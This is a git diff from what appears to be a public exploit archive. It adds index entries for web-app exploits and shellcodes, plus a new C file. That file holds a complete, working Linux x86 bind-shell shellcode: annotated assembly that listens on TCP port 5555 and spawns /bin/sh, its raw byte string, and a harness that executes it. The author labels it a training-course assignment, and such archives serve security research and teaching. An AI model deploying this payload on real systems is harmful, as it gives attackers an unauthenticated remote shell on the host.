Injection",2018-05-28,L0RD,webapps,php, +44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php, +44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php, +44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index d58ba033f..c113c01b0 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -887,3 +887,4 @@ id,file,description,date,author,type,platform 44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86 44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86 44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86 +44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86 diff --git a/shellcodes/linux_x86/44791.c b/shellcodes/linux_x86/44791.c new file mode 100644 index 000000000..606ef5652 --- /dev/null +++ b/shellcodes/linux_x86/44791.c @@ -0,0 +1,120 @@ +#include +#include + +/* + +; Bind TCP Shellcode +; Copyright 2018, Luca Di Domenico +; +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Title: Linux/x86 - TCP bind shell +; Author: Luca Di Domenico +; Website: https://thehackeradventure.com +; Blog post: https://thehackeradventure.com/2018/05/17/assignement1/ +; Twitter: @sudo45 +; SLAE-ID: 1245 + +global _start + +section .text +_start: + xor eax, eax + xor ebx, ebx + xor ecx, ecx + xor edx, edx + +; socket() + + push eax + mov al, 0x66 + mov bl, 0x1 + mov cl, 0x2 + push ebx + push ecx + lea ecx, [esp] + int 0x80 + +; bind() + + pop ecx + pop ebx + push word 0xb315 + push word cx + mov ecx, esp + mov dl, 0x10 + push edx + push ecx + push eax + xchg eax, edx + mov al, 0x66 + mov bl, 0x2 + mov ecx, esp + int 0x80 + +; listen() + + push eax + push edx + mov al, 0x66 + mov bl, 0x4 + mov ecx, esp + mov edx, eax + int 0x80 + +; accept() + + xchg eax, edx + pop edi + push edx + push edi + inc ebx + mov ecx, esp + int 0x80 + xchg ebx, eax + xor ecx, ecx + mov cl, 0x2 + +_dup2_loop: + + mov al, 0x3f + int 0x80 + dec ecx + jns _dup2_loop + +; execve() + + xor ecx, ecx + push ecx ; 0x00 + push 0x68732f2f ; hs// + push 0x6e69622f ; nib/ + mov ebx, esp + mov al, 0xb + int 0x80 + +*/ + +unsigned char code[] = \ +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\xb0\x66\xb3\x01\xb1\x02\x53\x51\x8d\x0c\x24\xcd\x80\x59\x5b\x66\x68\x15\xb3\x66\x51\x89\xe1\xb2\x10\x52\x51\x50\x92\xb0\x66\xb3\x02\x89\xe1\xcd\x80\x50\x52\xb0\x66\xb3\x04\x89\xe1\x89\xc2\xcd\x80\x92\x5f\x52\x57\x43\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"; + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file